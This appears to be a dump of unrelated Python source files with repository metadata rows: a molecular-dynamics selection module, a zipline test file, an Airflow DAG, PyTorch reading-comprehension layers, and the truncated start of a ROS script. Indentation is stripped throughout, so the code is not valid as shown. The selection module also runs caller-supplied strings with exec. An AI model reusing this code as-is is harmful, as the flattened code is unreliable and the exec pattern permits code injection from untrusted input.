# --------------------------------------------------------------------
# time selection class
class tselect:
def __init__(self,data):
self.data = data
# --------------------------------------------------------------------
def all(self):
data = self.data
for snap in data.snaps:
snap.tselect = 1
data.nselect = len(data.snaps)
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def one(self,n):
data = self.data
for snap in data.snaps:
snap.tselect = 0
i = data.findtime(n)
data.snaps[i].tselect = 1
data.nselect = 1
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def none(self):
data = self.data
for snap in data.snaps:
snap.tselect = 0
data.nselect = 0
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def skip(self,n):
data = self.data
count = n-1
for snap in data.snaps:
if not snap.tselect: continue
count += 1
if count == n:
count = 0
continue
snap.tselect = 0
data.nselect -= 1
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
def test(self,teststr):
data = self.data
snaps = data.snaps
cmd = "flag = " + teststr.replace("$t","snaps[i].time")
ccmd = compile(cmd,'','single')
for i in xrange(data.nsnaps):
if not snaps[i].tselect: continue
exec ccmd
if not flag:
snaps[i].tselect = 0
data.nselect -= 1
data.aselect.all()
print "%d snapshots selected out of %d" % (data.nselect,data.nsnaps)
# --------------------------------------------------------------------
# atom selection class
class aselect:
def __init__(self,data):
self.data = data
# --------------------------------------------------------------------
def all(self,*args):
data = self.data
if len(args) == 0: # all selected timesteps
for snap in data.snaps:
if not snap.tselect: continue
for i in xrange(snap.natoms): snap.aselect[i] = 1
snap.nselect = snap.natoms
else: # one timestep
n = data.findtime(args[0])
snap = data.snaps[n]
for i in xrange(snap.natoms): snap.aselect[i] = 1
snap.nselect = snap.natoms
# --------------------------------------------------------------------
def test(self,teststr,*args):
data = self.data
# replace all $var with snap.atoms references and compile test string
pattern = "\$\w*"
list = re.findall(pattern,teststr)
for item in list:
name = item[1:]
column = data.names[name]
insert = "snap.atoms[i][%d]" % column
teststr = teststr.replace(item,insert)
cmd = "flag = " + teststr
ccmd = compile(cmd,'','single')
if len(args) == 0: # all selected timesteps
for snap in data.snaps:
if not snap.tselect: continue
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
exec ccmd
if not flag:
snap.aselect[i] = 0
snap.nselect -= 1
for i in xrange(data.nsnaps):
if data.snaps[i].tselect:
print "%d atoms of %d selected in first step %d" % \
(data.snaps[i].nselect,data.snaps[i].natoms,data.snaps[i].time)
break
for i in xrange(data.nsnaps-1,-1,-1):
if data.snaps[i].tselect:
print "%d atoms of %d selected in last step %d" % \
(data.snaps[i].nselect,data.snaps[i].natoms,data.snaps[i].time)
break
else: # one timestep
n = data.findtime(args[0])
snap = data.snaps[n]
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
exec ccmd
if not flag:
snap.aselect[i] = 0
snap.nselect -= 1
| gpl-2.0 | 3,068,057,503,537,038,300 | 31.797396 | 79 | 0.548253 | false |
quantopian/zipline | tests/test_api_shim.py | 1 | 19024 | import warnings
from mock import patch
import numpy as np
import pandas as pd
from pandas.core.common import PerformanceWarning
from zipline.finance.trading import SimulationParameters
from zipline.testing import (
MockDailyBarReader,
create_daily_df_for_asset,
create_minute_df_for_asset,
str_to_seconds,
)
from zipline.testing.fixtures import (
WithCreateBarData,
WithMakeAlgo,
ZiplineTestCase,
)
from zipline.zipline_warnings import ZiplineDeprecationWarning
simple_algo = """
from zipline.api import sid, order
def initialize(context):
pass
def handle_data(context, data):
assert sid(1) in data
assert sid(2) in data
assert len(data) == 3
for asset in data:
pass
"""
history_algo = """
from zipline.api import sid, history
def initialize(context):
context.sid1 = sid(1)
def handle_data(context, data):
context.history_window = history(5, "1m", "volume")
"""
history_bts_algo = """
from zipline.api import sid, history, record
def initialize(context):
context.sid3 = sid(3)
context.num_bts = 0
def before_trading_start(context, data):
context.num_bts += 1
# Get history at the second BTS (beginning of second day)
if context.num_bts == 2:
record(history=history(5, "1m", "volume"))
def handle_data(context, data):
pass
"""
simple_transforms_algo = """
from zipline.api import sid
def initialize(context):
context.count = 0
def handle_data(context, data):
if context.count == 2:
context.mavg = data[sid(1)].mavg(5)
context.vwap = data[sid(1)].vwap(5)
context.stddev = data[sid(1)].stddev(5)
context.returns = data[sid(1)].returns()
context.count += 1
"""
manipulation_algo = """
def initialize(context):
context.asset1 = sid(1)
context.asset2 = sid(2)
def handle_data(context, data):
assert len(data) == 2
assert len(data.keys()) == 2
assert context.asset1 in data.keys()
assert context.asset2 in data.keys()
"""
sid_accessor_algo = """
from zipline.api import sid
def initialize(context):
context.asset1 = sid(1)
def handle_data(context,data):
assert data[sid(1)].sid == context.asset1
assert data[sid(1)]["sid"] == context.asset1
"""
data_items_algo = """
from zipline.api import sid
def initialize(context):
context.asset1 = sid(1)
context.asset2 = sid(2)
def handle_data(context, data):
iter_list = list(data.iteritems())
items_list = data.items()
assert iter_list == items_list
"""
reference_missing_position_by_int_algo = """
def initialize(context):
pass
def handle_data(context, data):
context.portfolio.positions[24]
"""
reference_missing_position_by_unexpected_type_algo = """
def initialize(context):
pass
def handle_data(context, data):
context.portfolio.positions["foobar"]
"""
class TestAPIShim(WithCreateBarData,
WithMakeAlgo,
ZiplineTestCase):
START_DATE = pd.Timestamp("2016-01-05", tz='UTC')
END_DATE = pd.Timestamp("2016-01-28", tz='UTC')
SIM_PARAMS_DATA_FREQUENCY = 'minute'
sids = ASSET_FINDER_EQUITY_SIDS = 1, 2, 3
@classmethod
def make_equity_minute_bar_data(cls):
for sid in cls.sids:
yield sid, create_minute_df_for_asset(
cls.trading_calendar,
cls.SIM_PARAMS_START,
cls.SIM_PARAMS_END,
)
@classmethod
def make_equity_daily_bar_data(cls, country_code, sids):
for sid in sids:
yield sid, create_daily_df_for_asset(
cls.trading_calendar,
cls.SIM_PARAMS_START,
cls.SIM_PARAMS_END,
)
@classmethod
def make_splits_data(cls):
return pd.DataFrame([
{
'effective_date': str_to_seconds('2016-01-06'),
'ratio': 0.5,
'sid': 3,
}
])
@classmethod
def make_adjustment_writer_equity_daily_bar_reader(cls):
return MockDailyBarReader(
dates=cls.nyse_calendar.sessions_in_range(
cls.START_DATE,
cls.END_DATE,
),
)
@classmethod
def init_class_fixtures(cls):
super(TestAPIShim, cls).init_class_fixtures()
cls.asset1 = cls.asset_finder.retrieve_asset(1)
cls.asset2 = cls.asset_finder.retrieve_asset(2)
cls.asset3 = cls.asset_finder.retrieve_asset(3)
def create_algo(self, code, filename=None, sim_params=None):
if sim_params is None:
sim_params = self.sim_params
return self.make_algo(
script=code,
sim_params=sim_params,
algo_filename=filename
)
def test_old_new_data_api_paths(self):
"""
Test that the new and old data APIs hit the same code paths.
We want to ensure that the old data API(data[sid(N)].field and
similar) and the new data API(data.current(sid(N), field) and
similar) hit the same code paths on the DataPortal.
"""
test_start_minute = self.trading_calendar.minutes_for_session(
self.sim_params.sessions[0]
)[1]
test_end_minute = self.trading_calendar.minutes_for_session(
self.sim_params.sessions[0]
)[-1]
bar_data = self.create_bardata(
lambda: test_end_minute,
)
ohlcvp_fields = [
"open",
"high",
"low"
"close",
"volume",
"price",
]
spot_value_meth = 'zipline.data.data_portal.DataPortal.get_spot_value'
def assert_get_spot_value_called(fun, field):
"""
Assert that get_spot_value was called during the execution of fun.
Takes in a function fun and a string field.
"""
with patch(spot_value_meth) as gsv:
fun()
gsv.assert_called_with(
self.asset1,
field,
test_end_minute,
'minute'
)
# Ensure that data.current(sid(n), field) has the same behaviour as
# data[sid(n)].field.
for field in ohlcvp_fields:
assert_get_spot_value_called(
lambda: getattr(bar_data[self.asset1], field),
field,
)
assert_get_spot_value_called(
lambda: bar_data.current(self.asset1, field),
field,
)
history_meth = 'zipline.data.data_portal.DataPortal.get_history_window'
def assert_get_history_window_called(fun, is_legacy):
"""
Assert that get_history_window was called during fun().
Takes in a function fun and a boolean is_legacy.
"""
with patch(history_meth) as ghw:
fun()
# Slightly hacky, but done to get around the fact that
# history( explicitly passes an ffill param as the last arg,
# while data.history doesn't.
if is_legacy:
ghw.assert_called_with(
[self.asset1, self.asset2, self.asset3],
test_end_minute,
5,
"1m",
"volume",
"minute",
True
)
else:
ghw.assert_called_with(
[self.asset1, self.asset2, self.asset3],
test_end_minute,
5,
"1m",
"volume",
"minute",
)
test_sim_params = SimulationParameters(
start_session=test_start_minute,
end_session=test_end_minute,
data_frequency="minute",
trading_calendar=self.trading_calendar,
)
history_algorithm = self.create_algo(
history_algo,
sim_params=test_sim_params
)
assert_get_history_window_called(
lambda: history_algorithm.run(),
is_legacy=True
)
assert_get_history_window_called(
lambda: bar_data.history(
[self.asset1, self.asset2, self.asset3],
"volume",
5,
"1m"
),
is_legacy=False
)
def test_sid_accessor(self):
"""
Test that we maintain backwards compat for sid access on a data object.
We want to support both data[sid(24)].sid, as well as
data[sid(24)]["sid"]. Since these are deprecated and will eventually
cease to be supported, we also want to assert that we're seeing a
deprecation warning.
"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(sid_accessor_algo)
algo.run()
# Since we're already raising a warning on doing data[sid(x)],
# we don't want to raise an extra warning on data[sid(x)].sid.
self.assertEqual(2, len(w))
# Check that both the warnings raised were in fact
# ZiplineDeprecationWarnings
for warning in w:
self.assertEqual(
ZiplineDeprecationWarning,
warning.category
)
self.assertEqual(
"`data[sid(N)]` is deprecated. Use `data.current`.",
str(warning.message)
)
def test_data_items(self):
"""
Test that we maintain backwards compat for data.[items | iteritems].
We also want to assert that we warn that iterating over the assets
in `data` is deprecated.
"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(data_items_algo)
algo.run()
self.assertEqual(4, len(w))
for idx, warning in enumerate(w):
self.assertEqual(
ZiplineDeprecationWarning,
warning.category
)
if idx % 2 == 0:
self.assertEqual(
"Iterating over the assets in `data` is deprecated.",
str(warning.message)
)
else:
self.assertEqual(
"`data[sid(N)]` is deprecated. Use `data.current`.",
str(warning.message)
)
def test_iterate_data(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(simple_algo)
algo.run()
self.assertEqual(4, len(w))
line_nos = [warning.lineno for warning in w]
self.assertEqual(4, len(set(line_nos)))
for idx, warning in enumerate(w):
self.assertEqual(ZiplineDeprecationWarning,
warning.category)
self.assertEqual("<string>", warning.filename)
self.assertEqual(line_nos[idx], warning.lineno)
if idx < 2:
self.assertEqual(
"Checking whether an asset is in data is deprecated.",
str(warning.message)
)
else:
self.assertEqual(
"Iterating over the assets in `data` is deprecated.",
str(warning.message)
)
def test_history(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
sim_params = self.sim_params.create_new(
self.sim_params.sessions[1],
self.sim_params.end_session
)
algo = self.create_algo(history_algo,
sim_params=sim_params)
algo.run()
self.assertEqual(1, len(w))
self.assertEqual(ZiplineDeprecationWarning, w[0].category)
self.assertEqual("<string>", w[0].filename)
self.assertEqual(8, w[0].lineno)
self.assertEqual("The `history` method is deprecated. Use "
"`data.history` instead.", str(w[0].message))
def test_old_new_history_bts_paths(self):
"""
Tests that calling history in before_trading_start gets us the correct
values, which involves 1) calling data_portal.get_history_window as of
the previous market minute, 2) getting adjustments between the previous
market minute and the current time, and 3) applying those adjustments
"""
algo = self.create_algo(history_bts_algo)
algo.run()
expected_vol_without_split = np.arange(386, 391) * 100
expected_vol_with_split = np.arange(386, 391) * 200
window = algo.recorded_vars['history']
np.testing.assert_array_equal(window[self.asset1].values,
expected_vol_without_split)
np.testing.assert_array_equal(window[self.asset2].values,
expected_vol_without_split)
np.testing.assert_array_equal(window[self.asset3].values,
expected_vol_with_split)
def test_simple_transforms(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
sim_params = SimulationParameters(
start_session=self.sim_params.sessions[8],
end_session=self.sim_params.sessions[-1],
data_frequency="minute",
trading_calendar=self.trading_calendar,
)
algo = self.create_algo(simple_transforms_algo,
sim_params=sim_params)
algo.run()
self.assertEqual(8, len(w))
transforms = ["mavg", "vwap", "stddev", "returns"]
for idx, line_no in enumerate(range(8, 12)):
warning1 = w[idx * 2]
warning2 = w[(idx * 2) + 1]
self.assertEqual("<string>", warning1.filename)
self.assertEqual("<string>", warning2.filename)
self.assertEqual(line_no, warning1.lineno)
self.assertEqual(line_no, warning2.lineno)
self.assertEqual("`data[sid(N)]` is deprecated. Use "
"`data.current`.",
str(warning1.message))
self.assertEqual("The `{0}` method is "
"deprecated.".format(transforms[idx]),
str(warning2.message))
# now verify the transform values
# minute price
# 2016-01-11 14:31:00+00:00 1561
# ...
# 2016-01-14 20:59:00+00:00 3119
# 2016-01-14 21:00:00+00:00 3120
# 2016-01-15 14:31:00+00:00 3121
# 2016-01-15 14:32:00+00:00 3122
# 2016-01-15 14:33:00+00:00 3123
# volume
# 2016-01-11 14:31:00+00:00 156100
# ...
# 2016-01-14 20:59:00+00:00 311900
# 2016-01-14 21:00:00+00:00 312000
# 2016-01-15 14:31:00+00:00 312100
# 2016-01-15 14:32:00+00:00 312200
# 2016-01-15 14:33:00+00:00 312300
# daily price (last day built with minute data)
# 2016-01-14 00:00:00+00:00 9
# 2016-01-15 00:00:00+00:00 3123
# mavg = average of all the prices = (1561 + 3123) / 2 = 2342
# vwap = sum(price * volume) / sum(volumes)
# = 889119531400.0 / 366054600.0
# = 2428.9259891830343
# stddev = stddev(price, ddof=1) = 451.3435498597493
# returns = (todayprice - yesterdayprice) / yesterdayprice
# = (3123 - 9) / 9 = 346
self.assertEqual(2342, algo.mavg)
self.assertAlmostEqual(2428.92599, algo.vwap, places=5)
self.assertAlmostEqual(451.34355, algo.stddev, places=5)
self.assertAlmostEqual(346, algo.returns)
def test_manipulation(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(simple_algo)
algo.run()
self.assertEqual(4, len(w))
for idx, warning in enumerate(w):
self.assertEqual("<string>", warning.filename)
self.assertEqual(7 + idx, warning.lineno)
if idx < 2:
self.assertEqual("Checking whether an asset is in data is "
"deprecated.",
str(warning.message))
else:
self.assertEqual("Iterating over the assets in `data` is "
"deprecated.",
str(warning.message))
def test_reference_empty_position_by_int(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(reference_missing_position_by_int_algo)
algo.run()
self.assertEqual(1, len(w))
self.assertEqual(
str(w[0].message),
"Referencing positions by integer is deprecated. Use an asset "
"instead."
)
def test_reference_empty_position_by_unexpected_type(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(
reference_missing_position_by_unexpected_type_algo
)
algo.run()
self.assertEqual(1, len(w))
self.assertEqual(
str(w[0].message),
"Position lookup expected a value of type Asset but got str"
" instead."
)
| apache-2.0 | 2,449,032,300,358,231,600 | 32.730496 | 79 | 0.539687 | false |
google/framework-for-osdu | osdu-r2/os-dags/other-log-ingest.py | 1 | 1161 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta
default_args = {
'start_date': airflow.utils.dates.days_ago(0),
'retries': 1,
'retry_delay': timedelta(minutes=50)
}
dag = DAG(
'Other_log_ingest',
default_args=default_args,
description='liveness monitoring dag',
schedule_interval=None,
dagrun_timeout=timedelta(minutes=60))
t1 = BashOperator(
task_id='echo',
bash_command='echo test',
dag=dag,
depends_on_past=False,
priority_weight=2**31-1)
| apache-2.0 | 6,901,343,015,972,973,000 | 29.552632 | 75 | 0.722653 | false |
calee88/ParlAI | parlai/agents/drqa_msmarco/layers.py | 1 | 17185 | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import pdb
#torch.backends.cudnn.enabled=False
# ------------------------------------------------------------------------------
# Modules
# ------------------------------------------------------------------------------
class Selective_Meanpool(nn.Module):
def __init__(self, input_size):
super(Selective_Meanpool, self).__init__()
self.input_size = input_size
def forward(self, x, word_end):
"""Mean pool across word boundary."""
# x : N x Tword x H (32 x 500 x 768)
# word_end : word end index of each paragraph, list
nBatch = len(word_end)
maxSent = len(max(word_end, key=len))
outputs = []
#pdb.set_trace()
for n in range(nBatch):
outputs_batch = []
startend = np.insert(word_end[n], 0, -1)
nSentence = len(startend)-1
#start_idx = Variable(torch.from_numpy(startend[:-1]) + 1) # Variable,
#end_idx = Variable(torch.from_numpy(startend[1:]) ) # Variable
start_idx = startend[:-1] + 1 # numpy.array
end_idx = startend[1:] # numpy.array
for s in range(nSentence):
end_idx_real = end_idx[s]+1
if end_idx_real < 0 :
end_idx_real = x.size()[1]
meanpool_idx = torch.from_numpy(np.arange(start_idx[s], end_idx_real))
meanpool_idx = Variable(meanpool_idx.cuda(async=True))
outputs_batch.append(torch.mean(x[n,:, :].index_select(0, meanpool_idx),0))
if nSentence < maxSent: # zero tensor padding
outputs_batch.append(Variable(torch.zeros(maxSent-nSentence, x.size()[-1]).cuda(async=True), requires_grad=False))
outputs_batch_tensor = torch.cat(outputs_batch, 0)
outputs.append(outputs_batch_tensor)
#pdb.set_trace()
output = torch.stack(outputs, 0)
return output
class StackedBRNN(nn.Module):
def __init__(self, input_size, hidden_size, num_layers,
dropout_rate=0, dropout_output=False, rnn_type=nn.LSTM,
concat_layers=False, padding=False):
super(StackedBRNN, self).__init__()
self.padding = padding
self.dropout_output = dropout_output
self.dropout_rate = dropout_rate
self.num_layers = num_layers
self.concat_layers = concat_layers
self.rnns = nn.ModuleList()
for i in range(num_layers):
input_size = input_size if i == 0 else 2 * hidden_size
self.rnns.append(rnn_type(input_size, hidden_size,
num_layers=1,
bidirectional=True))
def forward(self, x, x_mask):
"""Can choose to either handle or ignore variable length sequences.
Always handle padding in eval.
"""
# No padding necessary.
if x_mask.data.sum() == 0:
return self._forward_unpadded(x, x_mask)
# Pad if we care or if its during eval.
if self.padding or not self.training:
return self._forward_padded(x, x_mask)
# We don't care.
return self._forward_unpadded(x, x_mask)
def _forward_unpadded(self, x, x_mask):
"""Faster encoding that ignores any padding."""
#pdb.set_trace()
# Transpose batch and sequence dims
x = x.transpose(0, 1)
# Encode all layers
outputs = [x]
for i in range(self.num_layers):
rnn_input = outputs[-1]
# Apply dropout to hidden input
if self.dropout_rate > 0:
rnn_input = F.dropout(rnn_input,
p=self.dropout_rate,
training=self.training)
# Forward
rnn_output = self.rnns[i](rnn_input)[0]
outputs.append(rnn_output)
# Concat hidden layers
if self.concat_layers:
output = torch.cat(outputs[1:], 2)
else:
output = outputs[-1]
# Transpose back
output = output.transpose(0, 1)
# Dropout on output layer
if self.dropout_output and self.dropout_rate > 0:
output = F.dropout(output,
p=self.dropout_rate,
training=self.training)
return output
def _forward_padded(self, x, x_mask):
"""Slower (significantly), but more precise,
encoding that handles padding."""
# Compute sorted sequence lengths
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
_, idx_sort = torch.sort(lengths, dim=0, descending=True)
_, idx_unsort = torch.sort(idx_sort, dim=0)
lengths = list(lengths[idx_sort])
idx_sort = Variable(idx_sort)
idx_unsort = Variable(idx_unsort)
# Sort x
x = x.index_select(0, idx_sort)
# Transpose batch and sequence dims
x = x.transpose(0, 1)
# Pack it up
rnn_input = nn.utils.rnn.pack_padded_sequence(x, lengths)
# Encode all layers
outputs = [rnn_input]
for i in range(self.num_layers):
rnn_input = outputs[-1]
# Apply dropout to input
if self.dropout_rate > 0:
dropout_input = F.dropout(rnn_input.data,
p=self.dropout_rate,
training=self.training)
rnn_input = nn.utils.rnn.PackedSequence(dropout_input,
rnn_input.batch_sizes)
outputs.append(self.rnns[i](rnn_input)[0])
# Unpack everything
for i, o in enumerate(outputs[1:], 1):
outputs[i] = nn.utils.rnn.pad_packed_sequence(o)[0]
# Concat hidden layers or take final
if self.concat_layers:
output = torch.cat(outputs[1:], 2)
else:
output = outputs[-1]
# Transpose and unsort
output = output.transpose(0, 1)
output = output.index_select(0, idx_unsort)
# Dropout on output layer
if self.dropout_output and self.dropout_rate > 0:
output = F.dropout(output,
p=self.dropout_rate,
training=self.training)
return output
class SeqAttnMatch(nn.Module):
"""Given sequences X and Y, match sequence Y to each element in X.
* o_i = sum(alpha_j * y_j) for i in X
* alpha_j = softmax(y_j * x_i)
"""
def __init__(self, input_size, identity=False):
super(SeqAttnMatch, self).__init__()
if not identity:
self.linear = nn.Linear(input_size, input_size)
else:
self.linear = None
def forward(self, x, y, y_mask):
"""Input shapes:
x = batch * len1 * h
y = batch * len2 * h
y_mask = batch * len2
Output shapes:
matched_seq = batch * len1 * h
"""
#pdb.set_trace()
# Project vectors
if self.linear:
x_proj = self.linear(x.view(-1, x.size(2))).view(x.size())
x_proj = F.relu(x_proj)
y_proj = self.linear(y.view(-1, y.size(2))).view(y.size())
y_proj = F.relu(y_proj)
else:
x_proj = x
y_proj = y
# Compute scores
scores = x_proj.bmm(y_proj.transpose(2, 1))
# Mask padding
y_mask = y_mask.unsqueeze(1).expand(scores.size())
scores.data.masked_fill_(y_mask.data, -float('inf'))
# Normalize with softmax
alpha_flat = F.softmax(scores.view(-1, y.size(1)))
alpha = alpha_flat.view(-1, x.size(1), y.size(1))
# Take weighted average
matched_seq = alpha.bmm(y)
return matched_seq
class BilinearSeqAttn(nn.Module):
"""A bilinear attention layer over a sequence X w.r.t y:
* o_i = softmax(x_i'Wy) for x_i in X.
Optionally don't normalize output weights.
"""
def __init__(self, x_size, y_size, identity=False):
super(BilinearSeqAttn, self).__init__()
if not identity:
self.linear = nn.Linear(y_size, x_size)
else:
self.linear = None
def forward(self, x, y, x_mask):
"""
x = batch * len * h1
y = batch * h2
x_mask = batch * len
"""
#pdb.set_trace()
Wy = self.linear(y) if self.linear is not None else y
xWy = x.bmm(Wy.unsqueeze(2)).squeeze(2)
xWy.data.masked_fill_(x_mask.data, -float('inf'))
if self.training:
# In training we output log-softmax for NLL
alpha = F.log_softmax(xWy)
else:
# ...Otherwise 0-1 probabilities
alpha = F.softmax(xWy)
return alpha
class LinearSeqAttn(nn.Module):
"""Self attention over a sequence:
* o_i = softmax(Wx_i) for x_i in X.
"""
def __init__(self, input_size):
super(LinearSeqAttn, self).__init__()
self.linear = nn.Linear(input_size, 1)
def forward(self, x, x_mask):
"""
x = batch * len * hdim
x_mask = batch * len
"""
x_flat = x.view(-1, x.size(-1))
scores = self.linear(x_flat).view(x.size(0), x.size(1))
scores.data.masked_fill_(x_mask.data, -float('inf'))
alpha = F.softmax(scores)
return alpha
class GatedAttentionBilinearRNN(nn.Module):
"""Given sequences X and Y, match sequence Y to each element in X. --- eq(4) in r-net
(X=passage u^P, Y=Question u^Q)
* alpha^t_i = softmax(u^Q_j * Wu * u^P_i)
* c_t = sum(alpha^t_i * u^Q_i) for i in X
* gated[u^P_t, c_t] = sigmoid(W_g * [u^P_t, c_t])
* v^P_t = RNN(v^P_(t-1), gated[u^P_t, c_t])
"""
def __init__(self, x_size, y_size, hidden_size,
rnn_type=nn.LSTM,
gate=True, padding = False,
birnn=False, identity=False, concat=False, rnn=True):
super(GatedAttentionBilinearRNN, self).__init__()
self.num_layers = 1
self.hidden_size = hidden_size
self.padding = padding
self.concat_layers = concat
#pdb.set_trace()
if not identity:
self.linear = nn.Linear(y_size, x_size, bias=False)
else:
self.linear = None
self.gate = gate
if self.gate:
self.gate_layer = nn.Sequential(
nn.Linear(y_size + x_size, 1, bias=False ), # the 2nd hidden_size can be different from 'hidden_size'
nn.Sigmoid())
if not (hidden_size == (x_size+y_size)):
#self.bottleneck_layer = nn.Sequential(nn.Linear(y_size + x_size, hidden_size),
#nn.ReLU())
self.bottleneck_layer = nn.Linear(y_size + x_size, hidden_size)
input_size = hidden_size
else:
self.bottleneck_layer = None
input_size = y_size + x_size
self.rnn = rnn
if self.rnn:
self.rnns = nn.ModuleList()
self.rnns.append(rnn_type(input_size, hidden_size,
num_layers=1, bidirectional=birnn))
def forward(self, x, x_mask, y, y_mask):
"""Can choose to either handle or ignore variable length sequences.
Always handle padding in eval.
"""
# No padding necessary.
if x_mask.data.sum() == 0:
return self._forward_unpadded(x, x_mask, y, y_mask)
# Pad if we care or if its during eval.
if self.padding or not self.training:
return self._forward_padded(x, x_mask, y, y_mask)
# return self._forward_unpadded(x, x_mask, y, y_mask)
# We don't care.
return self._forward_unpadded(x, x_mask, y, y_mask)
def _gated_attended_input(self, x, x_mask, y, y_mask):
nbatch = x.size(0) #(batch, seq_len, input_size)
x_len = x.size(1)
y_len = y.size(1)
x_size = x.size(2)
y_size = y.size(2)
#tic = time.time()
# Attention
# * alpha^t_i = softmax(tanh( u^Q_j * W * u^P_i ))
# * c_t = sum(alpha^t_i * u^Q_i) for i in X
#pdb.set_trace()
Wy = self.linear(y.view(-1, y_size)).view(-1, y_len, x_size) if self.linear is not None else y
xWy = x.bmm(Wy.transpose(1,2))
xWy.data.masked_fill_(y_mask.data.unsqueeze(1).expand_as(xWy), -float('inf'))
alpha = F.softmax(xWy.view(-1, y_len))
# Ver1 (Problem : .repeat())
#pdb.set_trace()
#alpha = alpha.view(alpha.size(0), 1, y_len)
#attend_y = alpha.bmm(y.unsqueeze(1).repeat(1,x_len,1,1).view(nbatch*x_len, y_len,-1)).view(nbatch, x_len, -1) # HR ver1
# Ver2 -- get exactly same value as Ver1
alpha = alpha.view(nbatch, x_len, y_len)
attend_y = alpha.bmm(y)
#pdb.set_trace()
attend_y.data.masked_fill_(x_mask.unsqueeze(2).expand_as(attend_y).data, 0) ## comment out?
rnn_input = torch.cat((x, attend_y), 2)
# Gate: gated[u^P_t, c_t] = sigmoid(W_g * [u^P_t, c_t])
if self.gate:
gate = self.gate_layer(rnn_input.view(-1, rnn_input.size(2))).view(nbatch, x_len, 1).expand_as(rnn_input) #1, 1, rnn_input.size(2))
rnn_input = gate.mul(rnn_input)
# 128*3 *2= 1536 ==> too large as an RNN input? then insert a bottle neck layer
rnn_input = self.bottleneck_layer(rnn_input.view(-1, rnn_input.size(2))).view(nbatch, x_len, -1) if self.bottleneck_layer is not None else rnn_input
return rnn_input
def _forward_unpadded(self, x, x_mask, y, y_mask):
"""Faster encoding that ignores any padding."""
# Encode all layers
output = self._gated_attended_input(x, x_mask, y, y_mask)
# pdb.set_trace()
if self.rnn:
outputs = [output]
for i in range(self.num_layers): ## self.num_layers == 1
# RNN: v^P_t = RNN(v^P_(t-1), gated[u^P_t, c_t])
rnn_output = self.rnns[i](outputs[-1].transpose(0,1))[0] # batch_first = False
outputs.append(rnn_output)
output = outputs[1].transpose(0,1)
# Concat hidden layers
if self.concat_layers:
output = torch.cat((output, x), 2)
return output
def _forward_padded(self, x, x_mask, y, y_mask):
"""Slower (significantly), but more precise,
encoding that handles padding."""
# Compute sorted sequence lengths
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
_, idx_sort = torch.sort(lengths, dim=0, descending=True)
_, idx_unsort = torch.sort(idx_sort, dim=0)
lengths = list(lengths[idx_sort])
idx_sort = Variable(idx_sort)
idx_unsort = Variable(idx_unsort)
input = self._gated_attended_input(x, x_mask, y, y_mask)
if self.rnn:
# Sort x
input = input.index_select(0, idx_sort)
# Transpose batch and sequence dims
input = input.transpose(0, 1)
# Pack it up
rnn_input = nn.utils.rnn.pack_padded_sequence(input, lengths)
# Encode all layers
outputs = [rnn_input]
for i in range(self.num_layers):
rnn_input = outputs[-1]
outputs.append(self.rnns[i](rnn_input)[0])
# Unpack everything
for i, o in enumerate(outputs[1:], 1):
outputs[i] = nn.utils.rnn.pad_packed_sequence(o)[0]
# Transpose and unsort
output = outputs[1].transpose(0, 1)
output = output.index_select(0, idx_unsort)
else:
output = input
# Concat hidden layers or take final
if self.concat_layers:
output = torch.cat((output, x), 2)
return output
# ------------------------------------------------------------------------------
# Functional
# ------------------------------------------------------------------------------
def uniform_weights(x, x_mask):
"""Return uniform weights over non-masked input."""
alpha = Variable(torch.ones(x.size(0), x.size(1)))
if x.data.is_cuda:
alpha = alpha.cuda()
alpha = alpha * x_mask.eq(0).float()
alpha = alpha / alpha.sum(1).expand(alpha.size())
return alpha
def weighted_avg(x, weights):
"""x = batch * len * d
weights = batch * len
"""
return weights.unsqueeze(1).bmm(x).squeeze(1)
| bsd-3-clause | -1,450,149,187,795,908,400 | 34.360082 | 164 | 0.526622 | false |
EricssonResearch/scott-eu | simulation-ros/src/turtlebot2i/turtlebot2i_warehouse/src/simple_object_extractor.py | 1 | 1874 | #!/usr/bin/env python
from SceneObjectExtractor import SceneObjectExtractor
import time
import vrep
# Update rate in seconds
rate = 0.1
extractor = SceneObjectExtractor('127.0.0.1', 19997)
# List of object names to retrieve information
# For now it is hardcoded
